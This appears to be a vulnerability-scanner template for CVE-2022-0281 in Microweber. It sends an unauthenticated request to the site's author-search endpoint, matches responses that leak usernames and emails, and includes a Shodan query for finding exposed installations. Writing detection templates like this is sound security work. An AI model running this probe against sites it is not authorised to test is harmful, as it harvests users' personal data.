id: CVE-2022-0281 info: name: Microweber Information Disclosure author: pikpikcu severity: high description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0281 tags: cve,cve2022,microweber,disclosure metadata: shodan-query: 'http.favicon.hash:780351152' classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2022-0281 cwe-id: CWE-200 requests: - method: GET path: - "{{BaseURL}}/api/users/search_authors" matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - '"username":' - '"email":' - '"display_name":' condition: and # Enhanced by mp on 2022/02/28